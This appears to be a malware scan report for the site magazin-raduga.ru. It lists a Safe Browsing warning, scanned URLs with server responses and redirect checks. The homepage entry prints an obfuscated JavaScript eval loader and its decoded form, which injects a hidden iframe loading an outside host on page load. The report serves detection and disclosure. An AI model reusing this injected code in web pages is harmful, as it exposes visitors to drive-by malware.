Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=magazin-raduga.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://magazin-raduga.ru/ | 200 OK Content-Length: 9142 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';try{if(/12/.exec(23).index==0);}catch(qqq){s=String;}ee='e';e=window.eval;t='y';}h=2*Math.cos(Math.PI);n=[3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5, Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://diminishxstatss.info/stats/counter.php?id=2f585bea1e9e20b1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://diminishxstatss.info/stats/counter.php?id=2f585bea1e9e20b1');f.style.visibility='hidden';f.style.position='absolute'; <iframe src='http://diminishxstatss.info/stats/counter.php?id=2f585bea1e9e20b1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://expodimilano.it/wp-content/jquery.js | 404 Not Found Content-Length: 299 Content-Type: text/html | clean |
http://expodimilano.it/test404page.js | 404 Not Found Content-Length: 293 Content-Type: text/html | clean |
http://halehalemusic.com/css/header.js | 500 Can't connect to halehalemusic.com:80 Content-Length: 192 Content-Type: text/plain | clean |
http://robertwalz.com/header.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 27 Dec 2014 14:03:58 GMT Pragma: no-cache Location: http://www.robertwalz.com/header.js/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=OiXWC%2CWZHyrNsKFEbBvIk3; path=/ X-Pingback: http://www.robertwalz.com/wp/xmlrpc.php | clean |
http://www.robertwalz.com/header.js/ | 200 OK Content-Length: 5422 Content-Type: text/html | clean |
http://www.robertwalz.com/wp/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-content/plugins/pods/ui/js/pods.ui.js?ver=3.5.1 | 200 OK Content-Length: 590 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-content/themes/rw/js/jquery.cycle.min.js?ver=3.5.1 | 200 OK Content-Length: 20004 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-includes/js/jquery/jquery.form.min.js?ver=2.73 | 200 OK Content-Length: 11116 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-content/plugins/contact-form-7/scripts.js?ver=2.3 | 200 OK Content-Length: 4442 Content-Type: application/javascript | clean |
http://robertwalz.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 27 Dec 2014 14:04:05 GMT Pragma: no-cache Location: http://www.robertwalz.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=fUGQRPEIoAqRuPbb5Jbbx2; path=/ X-Pingback: http://www.robertwalz.com/wp/xmlrpc.php | clean |
http://www.robertwalz.com/ | 200 OK Content-Length: 5422 Content-Type: text/html | clean |
http://www.robertwalz.com/?page_id=2 | 200 OK Content-Length: 4507 Content-Type: text/html | clean |
http://www.robertwalz.com/?page_id=39 | 200 OK Content-Length: 12435 Content-Type: text/html | clean |
http://www.robertwalz.com/wp/wp-content/uploads/2011/03/DSCN0464_2.jpg | 200 OK Content-Length: 300522 Content-Type: image/jpeg | clean |
http://www.robertwalz.com/wp/wp-content/uploads/2011/03/DSCN6348.jpg | 200 OK Content-Length: 300522 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: magazin-raduga.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sat, 27 Dec 2014 14:03:56 GMT
Accept-Ranges: bytes
ETag: "98c4de-23b6-4baf95f56f500"
Server: Apache
Vary: Accept-Encoding
Content-Length: 9142
Content-Type: text/html; charset=windows-1251
Expires: Sat, 27 Dec 2014 14:03:56 GMT
Last-Modified: Sun, 11 Mar 2012 15:35:16 GMT
...9142 bytes of data.
GET / HTTP/1.1
Host: magazin-raduga.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sat, 27 Dec 2014 14:03:56 GMT
Accept-Ranges: bytes
ETag: "98c4de-23b6-4baf95f56f500"
Server: Apache
Vary: Accept-Encoding
Content-Length: 9142
Content-Type: text/html; charset=windows-1251
Expires: Sat, 27 Dec 2014 14:03:56 GMT
Last-Modified: Sun, 11 Mar 2012 15:35:16 GMT
...9142 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: magazin-raduga.ru
Referer: http://www.google.com/search?q=magazin-raduga.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: magazin-raduga.ru
Referer: http://www.google.com/search?q=magazin-raduga.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.